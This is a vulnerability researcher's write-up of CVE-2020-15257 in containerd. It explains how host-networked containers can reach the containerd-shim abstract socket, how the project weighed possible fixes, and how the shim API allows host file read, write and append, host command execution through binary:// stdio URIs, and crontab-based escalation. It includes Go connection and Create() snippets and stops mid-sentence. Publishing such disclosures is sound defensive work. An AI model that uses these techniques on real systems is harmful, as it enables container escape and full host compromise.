This post is a technical discussion of the underlying vulnerability of CVE-2020-15257, and how it can be exploited. Our technical advisory on this issue is available here, but this post goes much further into the process that led to finding the issue, the practicalities of exploiting the vulnerability itself, various complications around fixing the issue, and some final thoughts.
During an assessment a while back, I found an issue that enabled running arbitrary code in a Docker container that was running with host networking (e.g. --network=host
). Normally, this is pretty bad, because with Docker’s default capabilities, host networking enables listening in on all traffic and sending raw packets from arbitrary interfaces. But on the given system, there wasn’t a ton of attack surface; all traffic was encrypted directly to processes without load balancers and the only interesting attack seemed to be using raw packets to handshake with Let’s Encrypt and mint TLS certificates.
Sometime later, I started to think about it again and I noticed something when when running a netstat
command while in a host network Docker container:
# netstat -xlp Active UNIX domain sockets (only servers) Proto RefCnt Flags Type State I-Node PID/Program name Path ... unix 2 [ ACC ] STREAM LISTENING 178355 - /var/snap/lxd/common/lxd/unix.socket ... unix 2 [ ACC ] STREAM LISTENING 21723 - /run/containerd/containerd.sock.ttrpc unix 2 [ ACC ] STREAM LISTENING 21725 - /run/containerd/containerd.sock unix 2 [ ACC ] STREAM LISTENING 21780 - /var/run/docker/metrics.sock unix 2 [ ACC ] STREAM LISTENING 14309 - /run/systemd/journal/io.systemd.journal unix 2 [ ACC ] STREAM LISTENING 23321 - /var/run/docker/libnetwork/496e19fa620c.sock unix 2 [ ACC ] STREAM LISTENING 18640 - /run/dbus/system_bus_socket unix 2 [ ACC ] STREAM LISTENING 305835 - @/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock@ ... unix 2 [ ACC ] STREAM LISTENING 18645 - /run/docker.sock ...
As a refresher, normal Unix domain sockets are bound to a file path, but Linux supports “abstract namespace” Unix domain sockets that do not exist on the filesystem. These abstract Unix sockets are created in much the same way as normal Unix sockets, using a sockaddr_un
struct:
struct sockaddr_un { sa_family_t sun_family; /* AF_UNIX */ char sun_path[108]; /* Pathname */ };
While normal pathed Unix sockets use a sun_path
containing a NUL-terminated C string, abstract Unix sockets’ sun_path
begins with a null byte and can contain arbitrary binary content; their length is actually based on the size passed in to the bind(2)
syscall, which can be less than the size of the sockaddr_un
struct. The initial null byte in an abstract Unix socket is generally represented with an @
sign when printed.
Pathed Unix domain sockets can only be connect(2)
-ed to through the filesystem, and therefore host rootfs-bound pathed Unix sockets cannot generally be accessed from a container with a pivot_root(2)
-ed rootfs. However, abstract namespace Unix domain sockets are tied to network namespaces.
Note: Oddly enough, even though access isn’t tied to the network namespace a process is associated with, /proc/net/unix
(which is what the above netstat
command read from to obtain its output) lists pathed Unix sockets based on the network namespace they were bound from.
In the above netstat
output, we can clearly see a bunch of pathed Unix sockets related to container runtimes, e.g. LXD, Docker, and containerd. But we also see an abstract Unix socket in the form of /containerd-shim/<id>.sock
. One of these appears for each Docker container that is running on a given system.
Unlike pathed Unix sockets which have base access control checks applied based on their Unix file permissions, abstract Unix sockets have no built-in access controls, and must validate connections dynamically via pulling ancillary data with recvmsg(2)
(this is also how Unix sockets can pass file descriptors between processes). So we try to connect(2)
and…
# socat abstract-connect:/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock - ... socat[15] E connect(5, AF=1 "\0/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock", 89): Connection refused
“Connection refused.” So my first assumption was that, whatever this thing is, it’s validating incoming connections somehow. Perhaps it only accepts one connection at a time?
Reading a bit about the architecture of Docker and containerd,1 which was spun out of Docker, we find that containerd-shim
is the direct parent of a container’s init process. This is easily observed with the following commands run from the host:
# netstat -xlp | grep shim unix 2 [ ACC ] STREAM LISTENING 348524 29533/containerd-sh @/containerd-shim/....sock@ # pstree -Tspn 29533 systemd(1)───containerd(733)───containerd-shim(29533)───sh(29550)
So how does this thing get set up in the first place? The relevant code is part of the main containerd daemon, runtime/v1/shim/client/client.go
:2
func WithStart(binary, address, daemonAddress, cgroup string, debug bool, exitHandler func()) Opt { return func(ctx context.Context, config shim.Config) (_ shimapi.ShimService, _ io.Closer, err error) { socket, err := newSocket(address) if err != nil { return nil, nil, err } defer socket.Close() f, err := socket.File() ... cmd, err := newCommand(binary, daemonAddress, debug, config, f, stdoutLog, stderrLog) if err != nil { return nil, nil, err } if err := cmd.Start(); err != nil { return nil, nil, errors.Wrapf(err, "failed to start shim") } ... func newCommand(binary, daemonAddress string, debug bool, config shim.Config, socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) { selfExe, err := os.Executable() if err != nil { return nil, err } args := []string{ "-namespace", config.Namespace, "-workdir", config.WorkDir, "-address", daemonAddress, "-containerd-binary", selfExe, } ... cmd := exec.Command(binary, args...) ... cmd.ExtraFiles = append(cmd.ExtraFiles, socket) cmd.Env = append(os.Environ(), "GOMAXPROCS=2") ... func newSocket(address string) (*net.UnixListener, error) { if len(address) > 106 { return nil, errors.Errorf("%q: unix socket path too long (> 106)", address) } l, err := net.Listen("unix", "\x00"+address)
In short, the functor returned from WithStart()
creates an abstract Unix socket from a provided address
using newSocket()
. It then extracts the raw file descriptor from it and passes it directly to the child containerd-shim
process it starts with newCommand()
. We can confirm that this is the code creating our observed containerd-shim
process by the the command line arguments and environment variables it passes to the child:
# ps -q 29533 -o command= | cat containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/75aa678979e7f94411ab7a5e08e773fe5dff26a8852f59b3f60de48e96e32afc -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc # cat /proc/29533/environ | grep -a -E -o 'GOMAXPROCS=[0-9]+' GOMAXPROCS=2
So what now? Well, we can confirm the behavior of the containerd-shim
binary with respect to how it listens on the abstract Unix socket. The relevant code is within cmd/containerd-shim/main_unix.go
:3
func serve(ctx context.Context, server *ttrpc.Server, path string) error { var ( l net.Listener err error ) if path == "" { f := os.NewFile(3, "socket") l, err = net.FileListener(f) f.Close() path = "[inherited from parent]" } else { if len(path) > 106 { return errors.Errorf("%q: unix socket path too long (> 106)", path) } l, err = net.Listen("unix", "\x00"+path) }
Because my suspicion was that only the first connection to this socket is accepted, it would seem that there is a race condition in the above snippets whereby an attacker could list out the abstract namespace “path” before the containerd-shim
process is even spawned and hammer it for connections to get the first accept(2)
from containerd-shim
. I then made a modified version of the code that starts containerd-shim
so that it could be tested in isolation.
package main import ( "net" "io" "github.com/pkg/errors" "fmt" "os" "os/exec" "syscall" ) func newSocket(address string) (*net.UnixListener, error) { if len(address) > 106 { return nil, errors.Errorf("%q: unix socket path too long (> 106)", address) } l, err := net.Listen("unix", "\x00"+address) if err != nil { return nil, errors.Wrapf(err, "failed to listen to abstract unix socket %q", address) } return l.(*net.UnixListener), nil } func newCommand(socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) { args := []string{ "-namespace", "moby", "-workdir", "/var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo", "-address", "/run/containerd/containerd.sock", "-containerd-binary", "/usr/bin/containerd", "-runtime-root", "/var/run/docker/runtime-runc", "-debug", } cmd := exec.Command("/usr/bin/containerd-shim", args...) cmd.Dir = "/run/containerd/io.containerd.runtime.v1.linux/moby/yolo" cmd.SysProcAttr = &syscall.SysProcAttr{ Setpgid: true, } cmd.ExtraFiles = append(cmd.ExtraFiles, socket) cmd.Env = append(os.Environ(), "GOMAXPROCS=2") cmd.Stdout = stdout cmd.Stderr = stderr return cmd, nil } func main() { socket, err := newSocket("yoloshim") if err != nil { fmt.Printf("err: %s\n", err) return } defer socket.Close() f, err := socket.File() if err != nil { fmt.Printf("failed to get fd for socket\n") return } defer f.Close() stdoutLog, err := os.Create("/tmp/shim-stdout.log.txt") stderrLog, err := os.Create("/tmp/shim-stderr.log.txt") defer stdoutLog.Close() defer stderrLog.Close() cmd, err := newCommand(f, stdoutLog, stderrLog) if err != nil { fmt.Printf("err: %s\n", err) return } if err := cmd.Start(); err != nil { fmt.Printf("failed to start shim: %s\n", err) return } defer func() { if err != nil { cmd.Process.Kill() } }() go func() { cmd.Wait() if stdoutLog != nil { stdoutLog.Close() } if stderrLog != nil { stderrLog.Close() } }() }
Separately, I also wrote some code to connect to the containerd-shim
socket:
package main import ( "os" "context" "fmt" "time" "github.com/containerd/containerd/pkg/dialer" "github.com/containerd/ttrpc" shimapi "github.com/containerd/containerd/runtime/v1/shim/v1" ptypes "github.com/gogo/protobuf/types" ) func main() { ctx := context.Background() socket := os.Args[1] conn, err := dialer.Dialer("\x00"+socket, 5*time.Second) if err != nil { fmt.Printf("failed to connect: %s\n", err) return } client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() { fmt.Printf("connection closed\n") })) c := shimapi.NewShimClient(client) var empty = &ptypes.Empty{} info, err := c.ShimInfo(ctx, empty) if err != nil { fmt.Printf("err: %s\n", err) return } fmt.Printf("info.ShimPid: %d\n", info.ShimPid) }
So we run it and then try to connect to the containerd-shim
socket we created…
# mkdir -p /run/containerd/io.containerd.runtime.v1.linux/moby/yolo # mkdir -p /var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo/ # ./startshim # ./connectortest yoloshim info.ShimPid: 12866
And that seems to work. For good measure, we’ll get rid of this containerd-shim
, start another one, and try socat
again:
# socat ABSTRACT-CONNECT:yoloshim - ... socat[12890] E connect(5, AF=1 "\0yoloshim", 11): Connection refused
It fails, again. But our connection test code works:
# ./connectortest yoloshim info.ShimPid: 13737
So what’s going on? Let’s see what the test code is actually doing:
# strace -e socat ABSTRACT-CONNECT:yoloshim - ... socket(AF_UNIX, SOCK_STREAM, 0) = 5 connect(5, {sa_family=AF_UNIX, sun_path=@"yoloshim"}, 11) = -1 ECONNREFUSED (Connection refused) ... # strace -f -x ./connectortest yoloshim execve("./connectortest", ["./connectortest", "yoloshim"], 0x7ffdb4ce9e98 /* 18 vars */) = 0 ... [pid 13842] socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3 [pid 13842] setsockopt(3, SOL_SOCKET, SO_BROADCAST, [1], 4) = 0 [pid 13842] connect(3, {sa_family=AF_UNIX, sun_path=@"yoloshim\0"}, 12) = 0 ... [pid 13842] write(3, "\0\0\0001\0\0\0\1\1\0\n%containerd.runtime.l"..., 59) = 59 ... [pid 13844] read(3, "\0\0\0\5\0\0\0\1\2\0\22\3\10\251k", 4096) = 15 ... [pid 13842] write(1, "info.ShimPid: 13737\n", 20info.ShimPid: 13737 ) = 20 [pid 13842] exit_group(0 <unfinished ...> ... +++ exited with 0 +++
Looking closely, it appears that when the Go code connects, it embeds a null byte within the abstract Unix domain socket “path.” Digging into Go’s internals, it appears that Go does know how to handle abstract paths:4
func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) { name := sa.Name n := len(name) ... sl := _Socklen(2) if n > 0 { sl += _Socklen(n) + 1 } if sa.raw.Path[0] == '@' { sa.raw.Path[0] = 0 // Don't count trailing NUL for abstract address. sl-- }
However, this is arguably the wrong behavior as abstract Unix sockets can start with a literal @
sign, and this implementation would prevent idiomatic Go from ever connect(2)
-ing (or bind(2)
-ing) to them. Regardless, because containerd
embeds a raw \x00
at the start of the address, Go’s internals keep the null byte at the end. If you look all the way at the top of this post, you’ll see that there is, in fact, a second @
at the end of the containerd-shim
socket. And I probably should have noticed it; it’s definitely a bit more obvious with our test socket:
# netstat -xlp | grep yolo unix 2 [ ACC ] STREAM LISTENING 93884 13737/containerd-sh @yoloshim@
But our initial test case would have failed anyway. socat
doesn’t have a direct means of supporting arbitrary binary in abstract Unix domain socket “paths.” You can emulate some of it with something like the following:
# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x01')" - ... socat[15094] E connect(5, AF=1 "\0yoloshim\x01", 12): Connection refused
But because POSIX is built around NUL-terminated C strings, the same cannot be done for null bytes, as they will fail to pass through execve(2)
:
# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x00')" - ... socat[15099] E connect(5, AF=1 "\0yoloshim", 11): Connection refused
This is actually an issue we ran into when writing unixdump
, a tcpdump
-alike for Unix sockets. As a workaround, we added the -@
flag5 that tells unixdump
to parse the socket argument as base64, specifically so that null bytes and arbitrary binary could be used. Basically, this is something I definitely should have recognized the first time.
Now having a connection testing binary, we can relatively easily test if a host network namespace container can connect to our containerd-shim
or a real one:
$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro ubuntu:18.04 /bin/sh # /connectortest yoloshim info.ShimPid: 13737 # cat /proc/net/unix | grep shim 0000000000000000: 00000002 00000000 00010000 0001 01 93884 @yoloshim@ 0000000000000000: 00000002 00000000 00010000 0001 01 114224 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@ 0000000000000000: 00000003 00000000 00000000 0001 03 115132 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@ # /connectortest /containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock info.ShimPid: 15471
And it can, and that’s bad. But what is the underlying reason that we are able to connect in the first place? Looking at the containerd-shim
code that starts the service, we see that it sets up a ttrpc
“handshaker” with ttrpc.UnixSocketRequireSameUser()
:6
func newServer() (*ttrpc.Server, error) { return ttrpc.NewServer(ttrpc.WithServerHandshaker(ttrpc.UnixSocketRequireSameUser())) }
For reference, ttrpc
is containerd
’s custom gRPC implementation that uses a custom wire protocol not based on TLS/HTTP/H2 and focuses on supporting embedded environments. The implementation of ttrpc.UnixSocketRequireSameUser()
is shown below:7
// UnixSocketRequireUidGid requires specific *effective* UID/GID, rather than the real UID/GID. // // For example, if a daemon binary is owned by the root (UID 0) with SUID bit but running as an // unprivileged user (UID 1001), the effective UID becomes 0, and the real UID becomes 1001. // So calling this function with uid=0 allows a connection from effective UID 0 but rejects // a connection from effective UID 1001. // // See socket(7), SO_PEERCRED: "The returned credentials are those that were in effect at the time of the call to connect(2) or socketpair(2)." func UnixSocketRequireUidGid(uid, gid int) UnixCredentialsFunc { return func(ucred *unix.Ucred) error { return requireUidGid(ucred, uid, gid) } } ... func UnixSocketRequireSameUser() UnixCredentialsFunc { euid, egid := os.Geteuid(), os.Getegid() return UnixSocketRequireUidGid(euid, egid) } ... func requireUidGid(ucred *unix.Ucred, uid, gid int) error { if (uid != -1 && uint32(uid) != ucred.Uid) || (gid != -1 && uint32(gid) != ucred.Gid) { return errors.Wrap(syscall.EPERM, "ttrpc: invalid credentials") } return nil }
Essentially, the only check performed is that the user connecting is the same user as the one containerd-shim
is running as. In the standard case, this is root. However, if we are assuming a standard Docker container configuration with host networking, then we can also assume that the container is not user namespaced; in fact, neither Docker, nor containerd/runc appear to support the combination of host networking with user namespaces. Essentially, because root on the inside of the container is in fact the same root user by UID outside the container, we can connect to containerd-shim
, even without capabilities.
$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro --cap-drop ALL ubuntu:18.04 /bin/sh # /connectortest /containerd-shim/moby/419fa8aca5a8a5edbbdc5595cda9142ca487770616f5a3a2af0edc40cacadf89/shim.sock info.ShimPid: 3278
So how bad is this actually? Pretty bad as it turns out.
But let’s take a slight segue and talk about how this issue was remediated. We first reached out to the containerd project with this advisory (also linked below). Initially, the issue was not accepted as a vulnerability because the project considered host namespacing itself to be an intractable security issue. Needless to say, I disagree with such a notion, but it was also a bit of a red herring, and after some rounds of discussion, the core issue — that containerd creates highly sensitive Unix sockets that are highly exposed — was accepted. It is worth noting that, at one point, one developer claimed that this particular issue was well known, though there does not appear to be any evidence of this being the case (at least in English); if it were, the security community would have likely jumped on the issue long ago, though the null byte quirk may have been misconstrued as an access control check.
Overall, the path to a fix winded through a couple of options before our main recommended fix, switching to pathed Unix domain sockets, was implemented. While some of these other attempts had problems that would have enabled bypasses or opened alternate avenues of attack, I think it’s important to discuss what could have been and what would have gone wrong.
Note: While security practitioners reading this post may think that switching to pathed Unix domain sockets should have been so trivial as not to have required effort to be invested into the potential hardening of abstract sockets, it is worth noting that an implicit assumption of the containerd codebase was that these sockets were essentially garbage collected on container exit. Therefore, because this was not rocket science,8 any attempt to add pathed Unix sockets required a significant amount of cleanup code and non-trivial exit detection logic to invoke it at the right times.
One of the earliest discussions was on the feasibility of applying AppArmor or SELinux policies that would prevent access to the abstract containerd sockets. While recent versions of both AppArmor and SELinux support restricting access to abstract namespace Unix domain sockets, they are not an ideal fix. As containerd itself is not generally the component within a containerization toolchain that creates such LSM policies for containers, any such attempt to use them for this purpose would have to be implemented by each client of containerd, or by end-users if they even have the privilege to reconfigure those policies — which brings a large risk of misconfiguring or accidentally eliminating the default sets of rules that help to enforce the security model of containers. Additionally, even for containerd clients such as dockerd
it would be tricky to implement in a clean manner as there would be a chicken-and-egg problem with attempting to restrict access as the implementation- and version-specific scheme for containerd’s internal abstract sockets would need to be hardcoded within the client’s policy generator. While this could be done for Docker’s native support for AppArmor,9 anyone attempting to use the legitimate Docker on Red Hat’s distros (e.g. RHEL, CentOS, Fedora) instead of their also-ran podman would likely remain vulnerable to this issue. Red Hat’s SELinux ruleset for Docker was only ever a catch-up playing imitation of the genuine AppArmor policy and it is now likely unmaintained given their shift in focus to their Docker clone.
Another proposed fix was to introduce a form of authentication whereby, on connecting to the abstract socket, a client would need to provide a token value to prove its identity. However, the implementation used a single shared token value stored on disk and had no mechanism to prevent or rate-limit would-be clients from simply guessing the token value. While the initial implementation of this scheme had a timing side-channel due to a non-constant time token comparison — which could be heavily abused due to the communication occurring entirely on the same host through Unix sockets, without the overhead of the network stack — and also used a token generation scheme with slight biases, the main issues with this scheme are more operational. In addition to the fact that a protocol change such as this would potentially be so breaking as not to be backported, leaving large swathes of users exposed, it would also kick the can and create a valuable target for an attacker to obtain (i.e. the token) that could re-open the issue.
One of the more interesting proposed fixes was a scheme whereby the PID of the caller could be obtained from the peer process Unix credentials of the socket accessed using getsockopt(2)
’s SOL_SOCKET
SO_PEERCRED
option. With this PID, it would be possible to compare raw namespace ID values between the containerd-shim process on the host and the client process (e.g. via readlink /proc/<pid>/ns/mnt
). While this is definitely a cool way of validating the execution context of a client, it’s also extremely prone to race conditions. There is no guarantee that by the time userland code in the server calls getsockopt(2)
(or in the case of a client’s setsockopt(2)
call with SOL_SOCKET
and SO_PASSCRED
, where the server receives an ancillary message each time data is sent) and processes on the Unix credential data, that the client hasn’t passed the socket to a child, exited, and let another process take its PID. In fact, this is a fairly easy race to win as the client can wait or create a number of processes for PID wraparound to begin anew on the host and get close to its PID before exiting. In general, attempting to determine that the actual process connecting or sending a message to a Unix socket is the one you think it is was likely outside the threat model of SO_PEERCRED
/SO_PASSCRED
/SCM_CREDENTIALS
, and is fraught with danger if the client has UID/GID 0 (or effective CAP_SETUID
/CAP_SETGID
).
Given that we can talk to the containerd-shim
API, what does that actually get us? Going through the containerd-shim
API protobuf,10 we can see an API similar to Docker:
service Shim { ... rpc Create(CreateTaskRequest) returns (CreateTaskResponse); rpc Start(StartRequest) returns (StartResponse); rpc Delete(google.protobuf.Empty) returns (DeleteResponse); ... rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty); rpc Kill(KillRequest) returns (google.protobuf.Empty); rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty); ... }
While a number of these APIs can do fairly damaging things, the Create()
and Start()
APIs are more than enough to compromise a host, but maybe not in the way you might think. Obviously, if you can start an arbitrary container config you can run the equivalent of a --privileged
container, given that containerd-shim
generally runs as full root. But how are you going to get such a config file and have containerd-shim
load it? Let’s first take a look at the CreateTaskRequest
message passed to Create()
and the StartRequest
message passed to Start()
:
message CreateTaskRequest { string id = 1; string bundle = 2; string runtime = 3; repeated containerd.types.Mount rootfs = 4; bool terminal = 5; string stdin = 6; string stdout = 7; string stderr = 8; string checkpoint = 9; string parent_checkpoint = 10; google.protobuf.Any options = 11; } message StartRequest { string id = 1; }
As we can see from this, the pairing of these calls is very much like docker create
and docker start
in that the Start()
call simply starts a container configured by Create()
. So what can we do with Create()
? A fair amount as it turns out, but there are some restrictions. For example, at the start of Create()
,11 if any mounts are contained in the rootfs
field, Create()
will use the base filepath provided with the bundle
field to create a rootfs
directory. As of containerd 1.3.x, if it cannot create the directory (e.g. because it already exists) Create()
will fail early.
func (s *Service) Create(ctx context.Context, r *shimapi.CreateTaskRequest) (_ *shimapi.CreateTaskResponse, err error) { var mounts []process.Mount for _, m := range r.Rootfs { mounts = append(mounts, process.Mount{ Type: m.Type, Source: m.Source, Target: m.Target, Options: m.Options, }) } rootfs := "" if len(mounts) > 0 { rootfs = filepath.Join(r.Bundle, "rootfs") if err := os.Mkdir(rootfs, 0711); err != nil && !os.IsExist(err) { return nil, err } } ...
The bulk of the work in Create()
is handled through a call to process.Create(ctx, config)
. The purpose of containerd-shim
here is essentially to serve as a managed layer around runc
; for example, the bundle
field is passed directly to runc create --bundle <bundle>
, which will expect it to contain a config.json
file with the container config. However, another interesting facet of this function is how it processes the stdio fields, stdin
, stdout
, and stderr
with the createIO()
function.12
func createIO(ctx context.Context, id string, ioUID, ioGID int, stdio stdio.Stdio) (*processIO, error) { pio := &processIO{ stdio: stdio, } ... u, err := url.Parse(stdio.Stdout) if err != nil { return nil, errors.Wrap(err, "unable to parse stdout uri") } if u.Scheme == "" { u.Scheme = "fifo" } pio.uri = u switch u.Scheme { case "fifo": pio.copy = true pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio)) case "binary": pio.io, err = NewBinaryIO(ctx, id, u) case "file": filePath := u.Path if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil { return nil, err } var f *os.File f, err = os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) if err != nil { return nil, err } f.Close() pio.stdio.Stdout = filePath pio.stdio.Stderr = filePath pio.copy = true pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio)) ...
Since containerd 1.3.0, the containerd-shim
Create()
API stdio fields can be URIs that represent things like an IO processing binary that is run immediately in the context of containerd-shim
, outside any form of Linux namespacing. For example, the general structure of such a URI is the following:
binary:///bin/sh?-c=cat%20/proc/self/status%20>/tmp/foobar
The only restriction is that to run a binary IO processor, the ttrpc
connection must declare a containerd namespace. This is not a Linux namespace but an identifier used to help containerd to organize operations by client container runtime. One such way of passing this check is the following:
ctx := context.Background() md := ttrpc.MD{} md.Set("containerd-namespace-ttrpc", "notmoby") ctx = ttrpc.WithMetadata(ctx, md) conn, err := getSocket() if err != nil { fmt.Printf("err: %s\n", err) return } client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() { fmt.Printf("connection closed\n") })) c := shimapi.NewShimClient(client) ...
However, this is not as much of an interesting payload and it also doesn’t work with containerd 1.2.x, which is the version used by Docker’s own packaging. Instead, the underlying stdio implementation for 1.2.x only appears to support appending to existing files. In contrast, containerd 1.3.0’s file://
URIs will also create new files (and any necessary directories) if they do not exist.
To perform most of these operations, a valid bundle
path must be passed to Create()
. Luckily, there are two means available to us to make such a thing happen. The first is to use one’s own container’s ID to reference its legitimate containerd bundle
path (e.g. /run/containerd/io.containerd.runtime.v1.linux/moby/<id>/config.json
); the ID is available within /proc/self/cgroup
.
# cat /proc/self/cgroup 12:cpuset:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 11:pids:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 10:devices:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 9:cpu,cpuacct:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 8:net_cls,net_prio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 7:blkio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 6:freezer:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 5:hugetlb:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 4:perf_event:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 3:rdma:/ 2:memory:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 1:name=systemd:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237 0::/system.slice/containerd.service
Note: The config.json
file within the bundle
directory will contain the host path to the container’s root filesystem.
The second, which I only learned would be possible after I had written an exploit based on the first method, is to create a runc bundle configuration within your own container’s filesystem; the base path for your container’s filesystem on the host is available from the /etc/mtab
file mounted into the container (thanks @drraid/@0x7674).
# head -n 1 /etc/mtab overlay / overlay rw,relatime,lowerdir=/var/lib/docker/165536.165536/overlay2/l/EVYWL6E5PMDAS76BQVNOMGHLCA:/var/lib/docker/165536.165536/overlay2/l/WGXNHNVFLLGUXW7AWYAHAZJ3OJ:/var/lib/docker/165536.165536/overlay2/l/MC6M7WQGXRBLA5TRN5FAXRE3HH:/var/lib/docker/165536.165536/overlay2/l/XRVQ7R6RZ7XZ3C3LKQSAZDMFAO:/var/lib/docker/165536.165536/overlay2/l/VC7V4VA5MA3R4Z7ZYCHK5DVETT:/var/lib/docker/165536.165536/overlay2/l/5NBSWKYN7VDADBTD3R2LJRXH3M,upperdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/diff,workdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/work,xino=off 0 0
Note: The shared base directory of the upperdir
and workdir
paths contains a merged/
subdirectory that is the root of the container filesystem.
So, what can we do with this? Well, with the containerd ID for our host network namespace container, we can re-Create()
it from its existing config. In this situation, an interesting divergence between containerd 1.2.x and 1.3.x mentioned above is that we can’t pass mounts in for containerd 1.3.x via an RPC field; however, we can do so with containerd 1.2.x. When mounts are supplied via RPC fields, they are essentially passed directly to mount(2)
without validation; the only limitation is that the target is always the /run/containerd/io.containerd.runtime.v1.linux/moby/<id>/rootfs
directory. Additionally, these mount(2)
s are performed before any others used to build the container from the container image. However, it should be noted that standard Docker containers do not actually use the rootfs
directory directly and are instead based out of directories such as /var/lib/docker/overlay2/<id>/merged
. Due to this, we cannot simply bind mount(1)
"/"
to rootfs
and expect that a reduced directory image (i.e. one without /bin
) would be able to access the host filesystem. However, we can perform such a mount(2)
and then bind mount(2)
additional directories over that. The end result is that the subsequent binds are then applied to the host /
directory itself through the mount from rootfs
. However, this is an extremely dangerous operation as containerd(-shim)
’s final act of running runc delete
will cause the entire rootfs
directory to be recursively removed. As this would now point to /
on the host, this would result in the deletion of the entire filesystem. But if you would not heed the author’s dire warning, the following snippets may be used to test the issue:
# mkdir -p /tmp/fakeroot/{etc,proc} # echo "foo" > /tmp/fakeroot/etc/foo # mkdir -p /tmp/overmount/etc # echo "bar" > /tmp/overmount/etc/bar
_, err = c.Create(ctx, &shimapi.CreateTaskRequest{ ID: taskId, Bundle: bundle, Terminal: false, Stdin: "/dev/null", Stdout: "/dev/null", Stderr: "/dev/null", Rootfs: []*types.Mount{ { Type: "none", Source: "/tmp/fakeroot", Options: []string{ "rw", "bind", }, }, { Type: "none", Source: "/tmp/overmount", Options: []string{ "rw", "bind", }, }, }, })
Going back to containerd-shim
’s IO handling, we have a pretty clear arbitrary file read capability from pointing Stdin
to any file we choose. We also have an arbitrary file write with containerd-shim
’s file://
URI support in 1.3.x, and an arbitrary file append in both versions. Given the append-only restriction, any append modifications to our own config.json
are essentially ignored. Instead, a good target in general is /etc/crontab
if the host is running cron
. All you have to do is point Stdout
or Stderr
at it and then have your malicious container output a crontab
line.
Given that we can, on containerd 1.3.x, overwrite our own container’s config.json
and create a new container from it, or load a custom config.json
from our own container’s filesystem, what can we do to run a highly privileged container? First, we should talk about what this config.json
file actually is. It’s an OCI runtime config file13 that is technically supported by several implementations.
From a privilege escalation perspective, the relevant fields are process.capabilites.(bounding,effective,inheritable,permitted)
, process.(apparmorProfile,selinuxLabel)
, mounts
, linux.namespaces
, and linux.seccomp
. From an operational perspective, root.path
and process.(args,env)
are the important ones, with root.path
being the most important for us as. Given that it sets the root of the container filesystem from the perspective of the host, we will need to make sure it will point somewhere useful (i.e. if we plan to run something from an image). If “re-using” an existing container’s config.json
, such as our own, root.path
can be left untouched; but if loading one from our own container, root.path
would need to be patched up to reference somewhere in our container’s filesystem. As part of my exploit that overwrites my container’s config.json
file, I use jq
to transform its contents (obtained via Stdin
) to:
